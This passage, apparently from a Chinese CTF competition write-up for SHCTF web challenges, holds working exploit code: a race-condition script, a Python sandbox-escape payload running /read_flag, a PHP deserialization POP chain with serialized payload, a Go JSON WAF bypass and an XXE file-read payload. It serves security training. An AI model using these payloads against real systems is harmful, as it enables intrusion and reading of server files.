PASSWORD\n    }\n    resp = session.post(LOGIN_URL, data=data)\n    if resp.status_code == 302 or \"\u6ce8\u9500\" in resp.text or \"\u9000\u51fa\" in resp.text:\n        print(\"[+] \u767b\u5f55\u6210\u529f\")\n        return True\n    return False\n\ndef reset_account():\n    print(\"[*] \u91cd\u7f6e\u8d26\u6237\u72b6\u6001 (\u6e05\u7a7a\u4f59\u989d\u548c\u65e5\u5fd7)...\")\n    session.get(RESET_URL)\n\ndef attack_recharge(csrf_token):\n    data = {\n        \"csrfmiddlewaretoken\": csrf_token,\n        \"amount\": 10\n    }\n\n    try:\n        barrier.wait() \n    except threading.BrokenBarrierError:\n        pass\n\n    try:\n        session.post(RECHARGE_URL, data=data)\n    except:\n        pass\n\ndef main():\n    if not login():\n        return\n\n    for i in range(1, 11): \n        print(f\"n--- \u7b2c {i} \u6b21\u5c1d\u8bd5\u7ade\u4e89 ---\")\n\n        reset_account()\n\n        csrf_token = get_csrf_token(RECHARGE_URL)\n        if not csrf_token:\n            continue\n\n        barrier.reset()\n\n        threads = []\n        for _ in range(THREAD_COUNT):\n            t = threading.Thread(target=attack_recharge, args=(csrf_token,))\n            threads.append(t)\n            t.start()\n\n        for t in threads:\n            t.join()\n\n        try:\n            resp = session.get(STATUS_URL)\n            balance = int(resp.text)\n            print(f\"[+] \u5f53\u524d\u4f59\u989d: {balance}\")\n\n            if balance >= 50:\n                print(\"n[!] \u4f59\u989d\u5145\u8db3! \u6b63\u5728\u8d2d\u4e70 Flag...\")\n                flag_resp = session.get(BUY_FLAG_URL)\n                print(\"=\" * 50)\n                print(flag_resp.text)\n                print(\"=\" * 50)\n                break\n            else:\n                print(\"[-] \u7ade\u4e89\u5931\u8d25 (\u4f59\u989d\u672a\u8fbe50)\uff0c\u6b63\u5728\u91cd\u8bd5...\")\n        except Exception as e:\n            print(f\"[-] \u68c0\u67e5\u4f59\u989d\u51fa\u9519: {e}\")\n\nif __name__ == \"__main__\":\n    main()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{c0ndITl0N_RACE_I$_dAngeR#U$_pH#R_dj4N6#}<\/code><\/pre>\n\n\n\n
Eazy_Pyrunner<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u89c2\u5bdf URL \u53c2\u6570 ?file=pages\/about.html<\/code>\uff0c\u5b58\u5728\u660e\u663e\u7684\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u3002 \u76f4\u63a5\u8bbf\u95ee \/?file=app.py<\/code> \u8bfb\u53d6\u540e\u7aef\u6e90\u7801<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53d1\u73b0\u6838\u5fc3\u903b\u8f91\u5728 \/execute<\/code> \u63a5\u53e3\uff0c\u5b58\u5728\u4e25\u683c\u7684\u6c99\u7bb1\u9650\u5236\u3002<\/p>\n\n\n\n
\u6f0f\u6d1e\u5206\u6790<\/p>\n\n\n\n
\u6e90\u7801\u663e\u793a\u6709\u4e09\u91cd\u9632\u62a4\uff1a\nWAF: \u8fc7\u6ee4\u4e86 import, os, sys, open, read, flag \u4ee5\u53ca\u5355\u53cc\u5f15\u53f7 ' \"\u3002\n\u6a21\u5757\u6c61\u67d3: sys.modules['os'] = 'not allowed'\uff0c\u5bfc\u81f4\u76f4\u63a5\u5bfc\u5165 os \u5931\u8d25\u3002\nAudit Hook: \u4f7f\u7528 sys.addaudithook \u6ce8\u518c\u4e86\u4e00\u4e2a\u5ba1\u8ba1\u94a9\u5b50\uff0c\u68c0\u6d4b\u5230\u4efb\u4f55\u4e8b\u4ef6\uff08len(event) > 0\uff09\u90fd\u4f1a\u629b\u51fa\u5f02\u5e38\uff0c\u963b\u6b62\u4ee3\u7801\u6267\u884c\u3002<\/code><\/pre>\n\n\n\n
\u7ed5\u8fc7\u601d\u8def<\/p>\n\n\n\n
\u7ed5\u8fc7 Audit Hook (\u6838\u5fc3): Hook \u51fd\u6570\u5185\u90e8\u8c03\u7528\u4e86 len()\u3002\u5229\u7528 Python \u7684 LEGB \u89c4\u5219\uff0c\u5728\u5c40\u90e8\u4f5c\u7528\u57df\u91cd\u5b9a\u4e49 len = lambda x: 0\u3002\u5f53 Hook \u89e6\u53d1\u65f6\uff0c\u4f1a\u4f18\u5148\u4f7f\u7528\u6211\u4eec\u5b9a\u4e49\u7684\u201c\u5047 len\u201d\uff0c\u4ece\u800c\u7ed5\u8fc7\u957f\u5ea6\u68c0\u67e5\u3002\n\u7ed5\u8fc7 WAF: \u65e0\u6cd5\u4f7f\u7528\u5f15\u53f7\uff0c\u5229\u7528 chr() \u51fd\u6570\u52a8\u6001\u62fc\u63a5\u5b57\u7b26\u4e32\u6784\u9020\u654f\u611f\u8bcd\uff08\u5982 os, sys\uff09\u3002\u65e0\u6cd5\u76f4\u63a5\u5199\u5173\u952e\u5b57\uff0c\u901a\u8fc7 globals() \u548c getattr() \u83b7\u53d6\u5bf9\u8c61\u3002\n\u4fee\u590d\u73af\u5883: \u83b7\u53d6 sys.modules\uff0c\u4ece\u4e2d\u5220\u9664\u88ab\u6c61\u67d3\u7684 'os' \u952e\uff0c\u7136\u540e\u901a\u8fc7 __builtins__.__import__ \u91cd\u65b0\u52a0\u8f7d\u771f\u6b63\u7684 os \u6a21\u5757\u3002\n\u63d0\u6743\u83b7\u53d6 Flag: \u53d1\u73b0\u6839\u76ee\u5f55\u4e0b\u5b58\u5728 SUID \u7a0b\u5e8f \/read_flag\uff0c\u901a\u8fc7 os.popen('\/read_flag') \u6267\u884c\u83b7\u53d6 Flag\u3002<\/code><\/pre>\n\n\n\n
Payload \u6784\u9020<\/p>\n\n\n\n
\u5b9a\u4e49 len \u8fd4\u56de 0\u3002\n\u5229\u7528 chr() \u62fc\u51d1\u5b57\u7b26\u4e32\u3002\n\u6e05\u7406 sys.modules \u5e76\u91cd\u8f7d os\u3002\n\u6267\u884c \/read_flag \u5e76\u8bfb\u53d6\u8f93\u51fa\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import requests\nimport os\n\nurl = \"http:\/\/challenge.shc.tf:30589\/execute\"\n\nos.environ['HTTP_PROXY'] = ''\nos.environ['HTTPS_PROXY'] = ''\nos.environ['ALL_PROXY'] = ''\n\ndef c(s):\n    return \"+\".join([f\"chr({ord(i)})\" for i in s])\n\ndef exp():\n    s_blt = c(\"__builtins__\")\n    s_imp = c(\"__import__\")\n    s_sys = c(\"sys\")\n    s_mod = c(\"modules\")\n    s_os  = c(\"os\")\n    s_pop = c(\"popen\")\n    s_rd  = c(\"read\")\n    s_cmd = c(\"\/read_flag\")\n\n    payload = f\"\"\"\nlen=lambda x:0\nis_my_love_event=lambda x:True\ng=globals()\nb=g[{s_blt}]\ns=g[{s_sys}]\ngetattr(s,{s_mod}).pop({s_os})\nri=getattr(b,{s_imp})\no=ri({s_os})\np=getattr(o,{s_pop})({s_cmd})\nres=getattr(p,{s_rd})()\nprint(res)\n\"\"\"\n    try:\n        res = requests.post(url, json={'code': payload.strip()}, timeout=30, proxies={\"http\":None,\"https\":None})\n        print(res.json().get('stdout', 'No output'))\n    except Exception as e:\n        print(e)\n\nif __name__ == \"__main__\":\n    exp()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{c44a7a38-e8dc-4268-b472-6d5606c6091f}<\/code><\/pre>\n\n\n\n
Ezphp<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5165\u53e3\u70b9\uff1a
\u9898\u76ee\u901a\u8fc7 POST \u63a5\u6536\u53c2\u6570 travel<\/code>\uff0c\u7136\u540e\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\uff1a<\/p>\n\n\n\n
if(isset($_POST['travel'])){\n    $a = unserialize($_POST['travel']);\n    throw new Exception(\"How to Travel?\");\n}<\/code><\/pre>\n\n\n\n
\u96be\u70b9\uff1a
unserialize<\/code> \u4e4b\u540e\u7d27\u63a5\u7740\u629b\u51fa\u4e86\u4e00\u4e2a Exception<\/code>\u3002\u901a\u5e38\u60c5\u51b5\u4e0b\uff0cPHP \u811a\u672c\u672a\u6b63\u5e38\u7ed3\u675f\uff08\u88ab\u5f02\u5e38\u4e2d\u65ad\uff09\u65f6\uff0c\u5bf9\u8c61\u7684 __destruct<\/code> \u6790\u6784\u51fd\u6570\u53ef\u80fd\u4e0d\u4f1a\u6309\u7167\u9884\u671f\u6267\u884c\uff0c\u6216\u8005\u65e0\u6cd5\u770b\u5230\u8f93\u51fa\u3002\u6211\u4eec\u9700\u8981\u4e00\u79cd\u65b9\u6cd5\u8ba9 __destruct<\/code> \u5728 throw new Exception<\/code> \u4e4b\u524d\u6267\u884c\u3002<\/p>\n\n\n\n
\u89e3\u51b3\u529e\u6cd5\uff08GC \u63d0\u524d\u56de\u6536\uff09\uff1a\n\u5229\u7528\u6570\u7ec4\u7d22\u5f15\u8986\u76d6\u7684\u6280\u5de7\u3002\u5982\u679c\u6211\u4eec\u6784\u9020\u4e00\u4e2a\u6570\u7ec4 a:2:{i:0;O:3:\"Sun\"...;i:0;N;}\uff0c\u5f53\u53cd\u5e8f\u5217\u5316\u89e3\u6790\u7b2c\u4e8c\u4e2a i:0 \u65f6\uff0c\u4f1a\u5c06\u7b2c\u4e00\u4e2a i:0 \u4f4d\u7f6e\u7684\u5bf9\u8c61\u8986\u76d6\uff08\u79fb\u9664\u5f15\u7528\uff09\u3002\u6b64\u65f6\u8be5\u5bf9\u8c61\u7684\u5f15\u7528\u8ba1\u6570\u5f52\u96f6\uff0cPHP \u7684\u5783\u573e\u56de\u6536\u673a\u5236\uff08GC\uff09\u4f1a\u7acb\u5373\u9500\u6bc1\u8be5\u5bf9\u8c61\uff0c\u4ece\u800c\u89e6\u53d1 __destruct\u3002<\/code><\/pre>\n\n\n\n
POP \u94fe\u4ee3\u7801\u5ba1\u8ba1<\/p>\n\n\n\n
\u6211\u4eec\u9700\u8981\u4ece __destruct<\/code> \u5f00\u59cb\uff0c\u4e00\u6b65\u6b65\u5bfb\u627e\u5229\u7528\u94fe\u3002<\/p>\n\n\n\n
\u8d77\u70b9 Sun::__destruct<\/code><\/strong><\/p>\n\n\n\n
class Sun{\n    public $sun;\n    public function __destruct(){\n        die(\"Maybe you should fly to the \".$this->sun);\n    }\n}<\/code><\/pre>\n\n\n\n
$this->sun<\/code> \u88ab\u8fde\u63a5\u5230\u5b57\u7b26\u4e32\u4e2d\uff0c\u5982\u679c $this->sun<\/code> \u662f\u4e00\u4e2a\u5bf9\u8c61\uff0c\u4f1a\u89e6\u53d1\u8be5\u5bf9\u8c61\u7684 __toString<\/code> \u65b9\u6cd5\u3002<\/p>\n\n\n\n
\u5bfb\u627e\u542b\u6709 __toString<\/code> \u7684\u7c7b\u3002<\/p>\n\n\n\n
\u8df3\u677f Moon::__toString<\/code><\/strong><\/p>\n\n\n\n
class Moon{\n    public $nearside;\n    public function __tostring(){\n        $starship = $this->nearside;\n        $starship(); \/\/ \u5f53\u4f5c\u51fd\u6570\u8c03\u7528\n        return '';\n    }\n}<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u5c06 $this->nearside<\/code> \u5f53\u4f5c\u51fd\u6570\u8c03\u7528\u3002\u5982\u679c $this->nearside<\/code> \u662f\u4e00\u4e2a\u5bf9\u8c61\uff0c\u4f1a\u89e6\u53d1 __invoke<\/code> \u65b9\u6cd5\u3002<\/p>\n\n\n\n
\u76ee\u6807\uff1a<\/strong> \u5bfb\u627e\u542b\u6709 __invoke<\/code> \u7684\u7c7b\u3002<\/p>\n\n\n\n
\u8df3\u677f Earth::__invoke<\/code><\/strong><\/p>\n\n\n\n
class Earth{\n    public $onearth;\n    public $inearth;\n    public $outofearth;\n    public function __invoke(){\n        $oe = $this->onearth;\n        $ie = $this->inearth;\n        $ote = $this->outofearth;\n        $oe->$ie = $ote; \/\/ \u7ed9\u4e0d\u53ef\u8bbf\u95ee\u6216\u4e0d\u5b58\u5728\u7684\u5c5e\u6027\u8d4b\u503c\n    }\n}<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u6267\u884c\u4e86 $oe->$ie = $ote\u3002\u5373 $Object->Property = Value\u3002\n\u5982\u679c\u6211\u4eec\u63a7\u5236 $oe \u4e3a\u4e00\u4e2a\u5bf9\u8c61\uff0c\u4e14 $ie \u662f\u8be5\u5bf9\u8c61\u4e2d\u4e0d\u5b58\u5728\u6216\u79c1\u6709\u7684\u5c5e\u6027\uff0c\u5c31\u4f1a\u89e6\u53d1 __set \u65b9\u6cd5\u3002\n\u76ee\u6807\uff1a \u5bfb\u627e\u542b\u6709 __set \u7684\u7c7b\u3002<\/code><\/pre>\n\n\n\n
\u6838\u5fc3\u903b\u8f91 Solar::__set<\/code><\/strong><\/p>\n\n\n\n
class Solar{\n    \/\/ ... \n    public function __set($name,$key){\n        $this->Mars = $key;          \/\/ $key \u6765\u81ea Earth \u7684 $outofearth (\"\/flag\")\n        $Dyson = $this->Mercury;     \/\/ \u5185\u90e8\u5bf9\u8c61\n        $Sphere = $this->Venus;      \/\/ \u65b9\u6cd5\u540d\n        $Dyson->$Sphere($this->Mars);\/\/ \u52a8\u6001\u65b9\u6cd5\u8c03\u7528\n    }\n    \/\/ ...\n}\n\n\u8fd9\u91cc\u6211\u4eec\u63a7\u5236 $this->Mercury \u4e3a\u53e6\u4e00\u4e2a Solar \u5bf9\u8c61\uff08\u6211\u4eec\u79f0\u4e4b\u4e3a Inner Solar\uff09\uff0c\u63a7\u5236 $this->Venus \u4e3a\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u540d\uff08\u4f8b\u5982 SplFileObject\uff0c\u867d\u662f\u7c7b\u540d\u4f46\u5728\u6b64\u5904\u88ab\u89c6\u4e3a\u65b9\u6cd5\u540d\u8c03\u7528\uff09\u3002\n\u5f53\u8c03\u7528\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\uff0c\u4f1a\u89e6\u53d1 $Dyson (Inner Solar) \u7684 __call \u65b9\u6cd5\u3002<\/code><\/pre>\n\n\n\n
\u7ec8\u70b9 Solar::__call<\/code> (\u6267\u884c\u547d\u4ee4\/\u8bfb\u53d6\u6587\u4ef6)<\/strong><\/p>\n\n\n\n
    public function __call($func,$args){\n        \/\/ WAF \u68c0\u67e5\uff1a\u4e0d\u80fd\u5305\u542b system, exec \u7b49\u547d\u4ee4\u6267\u884c\u51fd\u6570\n        if(!preg_match(\"\/exec|...\/i\", $args[0])){\n            \/\/ $func \u662f\u65b9\u6cd5\u540d\uff08\u6765\u81ea\u4e0a\u4e00\u6b65\u7684 $Sphere\uff0c\u5373 \"SplFileObject\"\uff09\n            \/\/ $args[0] \u662f\u53c2\u6570\uff08\u6765\u81ea\u4e0a\u4e00\u6b65\u7684 $this->Mars\uff0c\u5373 \"\/flag\"\uff09\n\n            $exploar = new $func($args[0]); \/\/ \u76f8\u5f53\u4e8e new SplFileObject(\"\/flag\")\n            $road = $this->Jupiter;         \/\/ \u65b9\u6cd5\u540d\n            $exploar->$road($this->Saturn); \/\/ \u8c03\u7528\u65b9\u6cd5\n        }\n        else{\n            die(\"Black hole\");\n        }\n    }\n\n \u5229\u7528\u903b\u8f91\uff1a\n\u7ed5\u8fc7 WAF\uff1a\u6211\u4eec\u8981\u8bfb \/flag\uff0c\u6587\u4ef6\u540d\u4e0d\u5305\u542b\u9ed1\u540d\u5355\u5173\u952e\u5b57\u3002\n\u5b9e\u4f8b\u5316\uff1anew SplFileObject(\"\/flag\")\u3002SplFileObject \u662f PHP \u539f\u751f\u7c7b\uff0c\u7528\u4e8e\u6587\u4ef6\u64cd\u4f5c\u3002\n\u8c03\u7528\u65b9\u6cd5\uff1a$exploar \u73b0\u5728\u662f\u4e00\u4e2a\u6587\u4ef6\u5bf9\u8c61\u3002\u6211\u4eec\u9700\u8981\u628a\u6587\u4ef6\u5185\u5bb9\u6253\u5370\u51fa\u6765\u3002\nSplFileObject \u7ee7\u627f\u81ea SplFileInfo\uff0c\u4e14\u81ea\u8eab\u62e5\u6709 fpassthru() \u65b9\u6cd5\uff08\u5c06\u6587\u4ef6\u6307\u9488\u4e4b\u540e\u7684\u6240\u6709\u6570\u636e\u8f93\u51fa\u5230\u8f93\u51fa\u7f13\u51b2\u533a\uff09\u3002\n\u8bbe\u7f6e $this->Jupiter = \"fpassthru\"\u3002\n$this->Saturn \u53ef\u4ee5\u4e3a null\u3002<\/code><\/pre>\n\n\n\n
\u6784\u9020\u601d\u8def\u603b\u7ed3<\/p>\n\n\n\n
Inner Solar ($Dyson):\nJupiter = \u201cfpassthru\u201d\nSaturn = null\n\nOuter Solar ($oe):\nMercury = Inner Solar \u5bf9\u8c61\nVenus = \u201cSplFileObject\u201d (\u89e6\u53d1 Inner Solar \u7684 __call \u5e76\u4f5c\u4e3a\u7c7b\u540d\u5b9e\u4f8b\u5316)\n\nEarth ($nearside):\nonearth = Outer Solar \u5bf9\u8c61\ninearth = \u201cflag\u201d (\u968f\u610f\u5c5e\u6027\u540d\uff0c\u89e6\u53d1 __set)\noutofearth = \u201c\/flag\u201d (\u4f5c\u4e3a\u53c2\u6570\u4f20\u9012\u7ed9 SplFileObject)\n\nMoon ($sun):\nnearside = Earth \u5bf9\u8c61\n\nSun (\u5165\u53e3):\nsun = Moon \u5bf9\u8c61\n\nGC \u7ed5\u8fc7\u6570\u7ec4:\narray(0 => Sun\u5bf9\u8c61, 0 => null)<\/code><\/pre>\n\n\n\n
Payload<\/p>\n\n\n\n
exp.php<\/p>\n\n\n\n
<?php\n\nclass Sun {\n    public $sun;\n}\n\nclass Moon {\n    public $nearside;\n}\n\nclass Earth {\n    public $onearth;\n    public $inearth;\n    public $outofearth;\n}\n\nclass Solar {\n    public $Mercury;\n    public $Venus;\n    public $Jupiter;\n    public $Saturn;\n    public $Mars;\n}\n\n$innerSolar = new Solar();\n$innerSolar->Jupiter = \"fpassthru\";\n$innerSolar->Saturn = null;\n\n$outerSolar = new Solar();\n$outerSolar->Mercury = $innerSolar;\n$outerSolar->Venus = \"SplFileObject\";\n\n$earth = new Earth();\n$earth->onearth = $outerSolar;\n$earth->inearth = \"flag\";\n$earth->outofearth = \"\/flag\";\n\n$moon = new Moon();\n$moon->nearside = $earth;\n\n$sun = new Sun();\n$sun->sun = $moon;\n\n$sun_serialized = serialize($sun);\n\n$payload = 'a:2:{i:0;' . $sun_serialized . 'i:0;N;}';\n\necho \"\u751f\u6210\u7684 Payload:nn\";\necho $payload;\n\necho \"nnURL Encoded:n\";\necho urlencode($payload);\n?><\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
a:2:{i:0;O:3:\"Sun\":1:{s:3:\"sun\";O:4:\"Moon\":1:{s:8:\"nearside\";O:5:\"Earth\":3:{s:7:\"onearth\";O:5:\"Solar\":5:{s:7:\"Mercury\";O:5:\"Solar\":5:{s:7:\"Mercury\";N;s:5:\"Venus\";N;s:7:\"Jupiter\";s:9:\"fpassthru\";s:6:\"Saturn\";N;s:4:\"Mars\";N;}s:5:\"Venus\";s:13:\"SplFileObject\";s:7:\"Jupiter\";N;s:6:\"Saturn\";N;s:4:\"Mars\";N;}s:7:\"inearth\";s:4:\"flag\";s:10:\"outofearth\";s:5:\"\/flag\";}}}i:0;N;}\n\nURL Encoded:\na%3A2%3A%7Bi%3A0%3BO%3A3%3A%22Sun%22%3A1%3A%7Bs%3A3%3A%22sun%22%3BO%3A4%3A%22Moon%22%3A1%3A%7Bs%3A8%3A%22nearside%22%3BO%3A5%3A%22Earth%22%3A3%3A%7Bs%3A7%3A%22onearth%22%3BO%3A5%3A%22Solar%22%3A5%3A%7Bs%3A7%3A%22Mercury%22%3BO%3A5%3A%22Solar%22%3A5%3A%7Bs%3A7%3A%22Mercury%22%3BN%3Bs%3A5%3A%22Venus%22%3BN%3Bs%3A7%3A%22Jupiter%22%3Bs%3A9%3A%22fpassthru%22%3Bs%3A6%3A%22Saturn%22%3BN%3Bs%3A4%3A%22Mars%22%3BN%3B%7Ds%3A5%3A%22Venus%22%3Bs%3A13%3A%22SplFileObject%22%3Bs%3A7%3A%22Jupiter%22%3BN%3Bs%3A6%3A%22Saturn%22%3BN%3Bs%3A4%3A%22Mars%22%3BN%3B%7Ds%3A7%3A%22inearth%22%3Bs%3A4%3A%22flag%22%3Bs%3A10%3A%22outofearth%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7Di%3A0%3BN%3B%7D<\/code><\/pre>\n\n\n\n
\u89e3\u6790\u6d41\u7a0b\uff1a<\/strong><\/p>\n\n\n\n
a:2:{i:0;O:3:\"Sun\"...: PHP \u5f00\u59cb\u53cd\u5e8f\u5217\u5316\u6570\u7ec4\uff0c\u7d22\u5f15 0 \u88ab\u8d4b\u503c\u4e3a Sun \u5bf9\u8c61\u3002\n\n\u6b64\u65f6\uff0cSun \u5bf9\u8c61\u53ca\u5176\u5185\u90e8\u5d4c\u5957\u7684 Moon, Earth, Solar (Outer), Solar (Inner) \u5168\u90e8\u88ab\u521b\u5efa\u5728\u5185\u5b58\u4e2d\u3002\n\ni:0;N;}: PHP \u89e3\u6790\u5230\u6570\u7ec4\u7684\u7b2c\u4e8c\u4e2a\u5143\u7d20\uff0c\u7d22\u5f15\u4f9d\u7136\u662f 0\uff0c\u503c\u4e3a NULL (N)\u3002\n\n\u5173\u952e\u70b9\uff1a PHP \u5c06\u7d22\u5f15 0 \u7684\u503c\u4ece Sun \u5bf9\u8c61\u66f4\u65b0\u4e3a NULL\u3002\n\nGC \u89e6\u53d1\uff1a \u6b64\u65f6\uff0c\u5185\u5b58\u4e2d\u7684\u90a3\u4e2a Sun \u5bf9\u8c61\u6ca1\u6709\u4efb\u4f55\u53d8\u91cf\u5f15\u7528\u5b83\u4e86\u3002PHP \u7684\u5783\u573e\u56de\u6536\u673a\u5236\uff08Garbage Collection\uff09\u7acb\u5373\u4ecb\u5165\uff0c\u9500\u6bc1 Sun \u5bf9\u8c61\u3002\n\n\u6267\u884c\u6790\u6784\uff1a Sun \u5bf9\u8c61\u9500\u6bc1\u524d\uff0c__destruct() \u88ab\u8c03\u7528\u3002\nSun -> echo Moon\nMoon -> Earth()\nEarth -> OuterSolar->flag = \"\/flag\"\nOuterSolar -> InnerSolar->SplFileObject(\"\/flag\") (\u8c03\u7528\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u89e6\u53d1 call)\nInnerSolar -> new SplFileObject(\"\/flag\") -> fpassthru()\nflag \u88ab\u8f93\u51fa\uff01<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{8d65f55d-4ac8-472d-8dcd-4ea9336fd66f}<\/code><\/pre>\n\n\n\n
\u9636\u6bb52<\/strong><\/h2>\n\n\n\n
Go<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8003\u70b9<\/strong>\uff1a<\/p>\n\n\n\n
    \n
  1. WAF \u89c4\u5219\u7f3a\u9677\uff08\u6b63\u5219\u5339\u914d\/\u5927\u5c0f\u5199\u7ed5\u8fc7\uff09<\/li>\n\n\n\n
  2. Go \u8bed\u8a00 encoding\/json<\/code> \u89e3\u6790\u7279\u6027<\/li>\n<\/ol>\n\n\n\n
    \u5c06\u8bf7\u6c42\u4f53 JSON \u4e2d\u7684\u952e\u540d role<\/code> \u4fee\u6539\u4e3a\u5927\u5199 Role<\/code>\u3002<\/p>\n\n\n\n
    \u539f\u7406\u5206\u6790<\/strong>\uff1a<\/p>\n\n\n\n
    WAF \u5c42\uff08\u62e6\u622a\u5931\u8d25\uff09\uff1a\nWAF\uff08\u9632\u706b\u5899\uff09\u7684\u89c4\u5219\u901a\u5e38\u662f\u5199\u6b7b\u7684\u3002\u5b83\u53ef\u80fd\u8bbe\u7f6e\u4e86\u9488\u5bf9 JSON \u5185\u5bb9\u7684\u6b63\u5219\u5339\u914d\uff0c\u4e13\u95e8\u62e6\u622a\u952e\u503c\u5bf9 \"role\": \"admin\"\u3002\u5f53\u4f60\u628a\u952e\u540d\u6539\u6210 \"Role\" \u65f6\uff0cWAF \u8ba4\u4e3a\u8fd9\u4e0d\u662f\u5b83\u8981\u62e6\u622a\u7684\u654f\u611f\u5b57\u6bb5\uff0c\u56e0\u6b64\u653e\u884c\u3002\n\n\u540e\u7aef Go \u8bed\u8a00\u5c42\uff08\u89e3\u6790\u6210\u529f\uff09\uff1a\nGo \u8bed\u8a00\u7684\u6807\u51c6\u5e93 encoding\/json \u5728\u5c06 JSON \u6570\u636e\u89e3\u6790\uff08Unmarshal\uff09\u5230\u7ed3\u6784\u4f53\uff08Struct\uff09\u65f6\uff0c\u662f\u5927\u5c0f\u5199\u4e0d\u654f\u611f\u7684\u3002\n\u5373\u4fbf\u540e\u7aef\u7ed3\u6784\u4f53\u5b9a\u4e49\u7684\u662f role\uff0c\u5b83\u4e5f\u80fd\u8bc6\u522b\u5e76\u6b63\u786e\u89e3\u6790\u4f20\u5165\u7684 Role \u5b57\u6bb5\u3002<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    SHCTF{dfa548d6-24fa-4fc0-bbe2-e9ef23ad0956}<\/code><\/pre>\n\n\n\n
    Mini Blog<\/strong><\/h3>\n\n\n\n
    XXE , XML \u5916\u90e8\u5b9e\u4f53\u6ce8\u5165<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u770b\u6e90\u7801<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    var xmlData = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><post><title>' + title + '<\/title><content>' + content + '<\/content><\/post>';\n\nfetch('\/create', {\n    method: 'POST',\n    headers: { 'Content-Type': 'application\/xml; charset=utf-8' },\n    body: xmlData\n})<\/code><\/pre>\n\n\n\n
    \u524d\u7aef\u4ee3\u7801\u5c06\u7528\u6237\u7684\u8f93\u5165\u62fc\u63a5\u6210\u4e86 XML \u683c\u5f0f\u5e76\u53d1\u9001\u7ed9\u540e\u7aef\u3002\u5982\u679c\u540e\u7aef\u5728\u89e3\u6790\u8fd9\u6bb5 XML \u65f6\u6ca1\u6709\u7981\u7528\u201c\u5916\u90e8\u5b9e\u4f53\u201d\u52a0\u8f7d\uff0c\u653b\u51fb\u8005\u5c31\u53ef\u4ee5\u6784\u9020\u7279\u6b8a\u7684 XML \u6765\u8bfb\u53d6\u670d\u52a1\u5668\u4e0a\u7684\u6587\u4ef6\uff08\u5982 \/flag<\/code>\uff09\u3002<\/p>\n\n\n\n
    \u5728\u7f51\u9875\u4e0a\u968f\u4fbf\u586b\u70b9\u5185\u5bb9\uff0c\u70b9\u51fb\u201c\u7acb\u5373\u53d1\u5e03\u201d\uff0c\u4f7f\u7528 Burp Suite \u62e6\u622a\u8be5\u8bf7\u6c42\uff0c\u4fee\u6539\u5c31\u884c<\/p>\n\n\n\n
    \u5728 XML \u7684\u5934\u90e8\u63d2\u5165 DTD \u5b9a\u4e49\uff0c\u5229\u7528 SYSTEM<\/code> \u5173\u952e\u5b57\u8bfb\u53d6\u672c\u5730\u6587\u4ef6 \/flag<\/code>\uff0c\u5e76\u5728 <title><\/code> \u6807\u7b7e\u4e2d\u5f15\u7528\u8be5\u5b9e\u4f53\u3002<\/p>\n\n\n\n
    Payload<\/strong><\/p>\n\n\n\n
    <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE foo [\n<!ENTITY xxe SYSTEM \"file:\/\/\/flag\">\n]>\n<post>\n  <title>&xxe;<\/title>\n  <content>test<\/content>\n<\/post><\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
     SHCTF{a279a292-8df0-4db0-9564-2ac2c7b8b801}<\/code><\/pre>\n\n\n\n
    \u9636\u6bb53<\/strong><\/h2>\n\n\n\n
    \u4f60\u4e5f\u61c2java\uff1f<\/strong><\/h3>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    Java \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u3002<\/strong><\/p>\n\n\n\n
    \u6838\u5fc3\u903b\u8f91 (handle \u65b9\u6cd5):<\/p>\n\n\n\n
    \/\/ 1. \u8bfb\u53d6\u8bf7\u6c42\u4f53\u6570\u636e\u6d41\ntry (ObjectInputStream ois = new ObjectInputStream(exchange.getRequestBody())) {\n    \/\/ 2. \u76f4\u63a5\u53cd\u5e8f\u5217\u5316\u5bf9\u8c61\n    Object obj = ois.readObject();\n    if (obj instanceof Note) {\n        Note note = (Note) obj;\n        \/\/ 3. \u5982\u679c\u53cd\u5e8f\u5217\u5316\u51fa\u7684\u5bf9\u8c61 filePath \u4e0d\u4e3a\u7a7a\uff0c\u5219\u8bfb\u53d6\u8be5\u6587\u4ef6\u5e76\u8fd4\u56de\u5185\u5bb9\n        if (note.getFilePath() != null) {\n            echo(readFile(note.getFilePath())); \/\/ \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u70b9\n        }\n    }\n}<\/code><\/pre>\n\n\n\n
    \u5229\u7528\u601d\u8def:<\/p>\n\n\n\n
